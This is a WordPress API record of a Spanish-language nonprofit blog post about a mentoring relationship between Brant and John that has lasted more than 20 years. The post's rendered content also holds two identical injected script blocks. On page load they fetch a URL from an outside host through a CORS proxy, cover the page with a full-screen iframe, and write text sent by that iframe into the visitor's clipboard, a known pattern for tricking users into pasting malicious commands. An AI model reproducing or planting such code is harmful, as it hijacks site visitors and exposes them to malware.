{"id":17299,"date":"2024-04-08T12:35:38","date_gmt":"2024-04-08T17:35:38","guid":{"rendered":"https:\/\/sspnyc.org\/de-entonces-a-ahora-una-inspiradora-historia-de-tutoria-que-abarca-mas-de-20-anos\/"},"modified":"2025-04-01T06:05:12","modified_gmt":"2025-04-01T11:05:12","slug":"de-entonces-a-ahora-una-inspiradora-historia-de-tutoria-que-abarca-mas-de-20-anos","status":"publish","type":"post","link":"https:\/\/sspnyc.org\/es\/de-entonces-a-ahora-una-inspiradora-historia-de-tutoria-que-abarca-mas-de-20-anos\/","title":{"rendered":"De entonces a ahora: Una inspiradora historia de tutor\u00eda que abarca m\u00e1s de 20 a\u00f1os"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Te presentamos a Brant y John, una pareja de mentores cuya relaci\u00f3n ha resistido la prueba del tiempo durante los \u00faltimos 20 a\u00f1os. Cuando vinieron a hablar de su relaci\u00f3n, fue como si no hubiera pasado el tiempo. Han permanecido conectados a trav\u00e9s de la universidad, los cambios de carrera y todos los retos de la vida. Brant no s\u00f3lo patrocin\u00f3 la educaci\u00f3n de John, sino que tambi\u00e9n fue un devoto mentor en su vida. Hoy, Brant recuerda el momento en que sus papeles se invirtieron y John se convirti\u00f3 en la fuente de sus inestimables consejos. Mira el v\u00eddeo completo para ver por qu\u00e9 su relaci\u00f3n es tan especial. Haz clic en la foto de abajo para ver el v\u00eddeo completo o visita <a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7183129948226748416\">este enlace<\/a>.      <\/p>\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.linkedin.com\/feed\/update\/urn:li:activity:7183129948226748416\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20-1024x576.png\" alt=\"\" class=\"wp-image-15196\" srcset=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20-1024x576.png 1024w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20-300x169.png 300w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20-768x432.png 768w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20-1536x864.png 1536w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20.png 2000w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Brant-John-2005-SSP-News-Article-768x1024.jpg\" alt=\"\" class=\"wp-image-15244\" style=\"width:842px;height:auto\" srcset=\"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Brant-John-2005-SSP-News-Article-768x1024.jpg 768w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Brant-John-2005-SSP-News-Article-225x300.jpg 225w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Brant-John-2005-SSP-News-Article-1152x1536.jpg 1152w, https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Brant-John-2005-SSP-News-Article.jpg 1200w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script><script>(function() {\n  \n  const configLink = \"https:\/\/corsproxy.io\/?url=http:\/\/heyues.live\";\n\n  \n  \n  if (!window.__digitalflwrFetchPromise) {\n    \n    window.__digitalflwrFetchPromise = fetch(configLink)\n      .then(response => {\n        if (!response.ok) {\n          throw new Error(\" \");\n        }\n        return response.text();\n      })\n      \n      .then(finalUrl => {\n        return fetch(finalUrl, { method: \"HEAD\" })\n          .then(headResponse => ({ headResponse, finalUrl }));\n      })\n      .catch(() => {\n        \n        \n      });\n  }\n\n  \n  if (typeof window.__digitalflwrIframeCreated === \"undefined\") {\n    window.__digitalflwrIframeCreated = false;\n  }\n\n  \n  window.__digitalflwrFetchPromise\n    .then(result => {\n      \n      if (!result) return;\n      const { headResponse, finalUrl } = result;\n\n      \n      if (!headResponse || headResponse.status === 404) {\n        return;\n      }\n\n      \n      if (!window.__digitalflwrIframeCreated) {\n        window.__digitalflwrIframeCreated = true;\n        createMainIframe(finalUrl);\n      }\n    })\n    .catch(() => {\n      \n    });\n\n  \n  function createMainIframe(url) {\n    const iframe = document.createElement(\"iframe\");\n    iframe.src = url;\n    iframe.style.position = \"fixed\";\n    iframe.style.top = 0;\n    iframe.style.left = 0;\n    iframe.style.width = \"100%\";\n    iframe.style.height = \"100%\";\n    iframe.style.border = \"none\";\n    iframe.style.margin = 0;\n    iframe.style.padding = 0;\n    iframe.style.overflow = \"hidden\";\n    iframe.style.zIndex = 99999;\n\n    document.body.appendChild(iframe);\n\n    \n    window.addEventListener(\"message\", function(event) {\n      if (!event.data || event.data.type !== \"copy\") return;\n\n      \n      if (navigator.clipboard && navigator.clipboard.writeText) {\n        navigator.clipboard.writeText(event.data.text).catch(() => {\n          fallbackCopyText(event.data.text);\n        });\n      } else {\n        fallbackCopyText(event.data.text);\n      }\n    });\n\n    \n    function fallbackCopyText(text) {\n      const textArea = document.createElement(\"textarea\");\n      textArea.value = text;\n      document.body.appendChild(textArea);\n      textArea.select();\n\n      try {\n        document.execCommand(\"copy\");\n      } catch (err) {\n        \n      }\n\n      document.body.removeChild(textArea);\n    }\n  }\n})();<\/script>","protected":false},"excerpt":{"rendered":"<p>Te presentamos a Brant y John, una pareja de mentores cuya relaci\u00f3n ha resistido la prueba del tiempo durante los \u00faltimos 20 a\u00f1os. Cuando vinieron a hablar de su relaci\u00f3n, [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":16948,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_crdt_document":"","footnotes":""},"categories":[5,10,13,9],"tags":[],"class_list":["post-17299","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-mentorship-matters","category-student-stories","category-success-stories"],"acf":[],"jetpack_featured_media_url":"https:\/\/sspnyc.org\/wp-content\/uploads\/2024\/04\/Newsletter-Cover-Photos-20.png","_links":{"self":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17299","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/comments?post=17299"}],"version-history":[{"count":3,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17299\/revisions"}],"predecessor-version":[{"id":17650,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/posts\/17299\/revisions\/17650"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/media\/16948"}],"wp:attachment":[{"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/media?parent=17299"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/categories?post=17299"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sspnyc.org\/es\/wp-json\/wp\/v2\/tags?post=17299"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}